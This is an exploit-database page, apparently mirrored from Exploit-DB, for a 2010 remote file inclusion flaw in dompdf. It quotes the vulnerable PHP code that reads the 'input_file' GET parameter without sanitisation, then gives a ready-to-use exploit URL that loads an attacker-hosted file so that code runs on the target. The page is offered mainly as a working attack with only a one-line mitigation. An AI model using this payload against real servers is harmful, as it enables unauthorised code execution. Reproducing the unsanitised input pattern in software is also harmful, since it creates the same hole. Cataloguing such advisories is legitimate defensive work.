header-logo
Suggest Exploit
vendor:
dompdf
by:
Andre_Corleone
7,5
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: dompdf
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Ubuntu 10.04
2010

apps dompdf RFI Vulnerability

A vulnerability exists in apps dompdf, which allows a remote attacker to include a file from a remote location, due to insufficient sanitization of user-supplied input to the 'input_file' parameter. An attacker can exploit this vulnerability to include a malicious file from a remote location and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

==================================
  apps dompdf RFI Vulnerability
==================================

====================================================
[x] ExpL0it TitLe : apps dompdf RFI Vulnerability
[x] DatE          : 01 September 2010
[x] AutH0r        : Andre_Corleone
[x] Software Link : www.digitaljunkies.ca/dompdf/
[x] h0mE          : http://tecon-crew.org
[x] TestEd 0n     : linux ubuntu 10.04
[x] d0rK          : :P
====================================================

==========================================================================================
[x]bug heRe:
if ( isset($_GET["input_file"]) )
$file = rawurldecode($_GET["input_file"]);
else
throw new DOMPDF_Exception("An input file is required (i.e. input_file _GET variable).");
==========================================================================================

==================================================================
[x]expL0iT:
http://www.site.com/dompdf/dompdf.php?input_file=[evilc0de.txt?]
==================================================================

============================================================================================
[x]th4nKs t0:
ALLAH SWT,Muhammad SAW,my Parents,my lovely HerliZ Dian Permathasari
guitariznoize | zee_eichel | jImMYrOmAnTiCdEvIl | 45tr0_k1ll1n9 | all Tecon Crew | and you
============================================================================================

=====================
[x]Jakarta,Indonesia
=====================

Navigation

Suggest Exploit

Services By CQR